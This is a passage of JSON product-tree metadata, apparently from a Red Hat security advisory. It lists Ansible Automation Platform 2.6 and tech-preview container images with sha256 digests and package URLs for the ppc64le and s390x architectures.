"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/hub-rhel9@sha256%3Aa85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/hub-rhel9\u0026tag=1785753568"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/hub-rhel9-operator@sha256%3A5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator\u0026tag=1785629524"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/hub-web-rhel9@sha256%3A50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9\u0026tag=1785756951"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/metrics-service-rhel9-operator@sha256%3Ad7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator\u0026tag=1785629735"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/metrics-service-rhel9@sha256%3A033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9\u0026tag=1785634026"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/de-minimal-rhel9@sha256%3A3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9\u0026tag=1785647559"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/de-supported-rhel9@sha256%3Ae7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9\u0026tag=1785649812"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ee-minimal-rhel9@sha256%3A87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9\u0026tag=1785779178"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ee-supported-rhel9@sha256%3A7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9\u0026tag=1785777436"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/platform-resource-rhel9-operator@sha256%3A653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator\u0026tag=1785630454"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/platform-resource-runner-rhel9@sha256%3A9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9\u0026tag=1785770922"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/receptor-rhel9@sha256%3A461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/receptor-rhel9\u0026tag=1785632117"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"product_identification_helper": {
"purl": "pkg:oci/mcp-server-rhel9@sha256%3A644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9\u0026tag=1785773509"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"product_identification_helper": {
"purl": "pkg:oci/aap-must-gather-rhel9@sha256%3Adbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9\u0026tag=1785630119"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ansible-builder-rhel9@sha256%3A5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9\u0026tag=1785745574"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ansible-devspaces-rhel9@sha256%3Ab13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9\u0026tag=1785629819"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ansible-dev-tools-rhel9@sha256%3Ad7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9\u0026tag=1785784320"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-chatbot-rhel9@sha256%3A1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9\u0026tag=1785646188"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-rhel9@sha256%3Ad1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9\u0026tag=1785775360"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-rhel9-operator@sha256%3A5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator\u0026tag=1785629366"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"product_identification_helper": {
"purl": "pkg:oci/mcp-tools-rhel9@sha256%3A417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9\u0026tag=1785633968"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"product_identification_helper": {
"purl": "pkg:oci/controller-rhel9@sha256%3Ab46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/controller-rhel9\u0026tag=1785753810"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/controller-rhel9-operator@sha256%3A47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator\u0026tag=1785629452"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-rhel9@sha256%3A464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9\u0026tag=1785633038"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-rhel9-operator@sha256%3A2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator\u0026tag=1785629468"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-ui-rhel9@sha256%3A8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9\u0026tag=1785730469"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"product_identification_helper": {
"purl": "pkg:oci/gateway-rhel9@sha256%3A6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/gateway-rhel9\u0026tag=1785780020"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x",
"product_identification_helper": {
"purl": "pkg:oci/gateway-rhel9-operator@sha256%3Af5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator\u0026tag=1785774574"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/gateway-proxy-rhel9@sha256%3Ada378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9\u0026tag=1785748239"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
"product_identification_helper": {
"purl": "pkg:oci/hub-rhel9@sha256%3A71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/hub-rhel9\u0026tag=1785753568"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"product_identification_helper": {
"purl": "pkg:oci/hub-rhel9-operator@sha256%3Ac1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator\u0026tag=1785629524"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
"product_identification_helper": {
"purl": "pkg:oci/hub-web-rhel9@sha256%3A0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9\u0026tag=1785756951"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
"product_identification_helper": {
"purl": "pkg:oci/metrics-service-rhel9-operator@sha256%3A0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator\u0026tag=1785629735"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"product_identification_helper": {
"purl": "pkg:oci/metrics-service-rhel9@sha256%3A9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9\u0026tag=1785634026"
}
}
},
{
"category": "product_version",
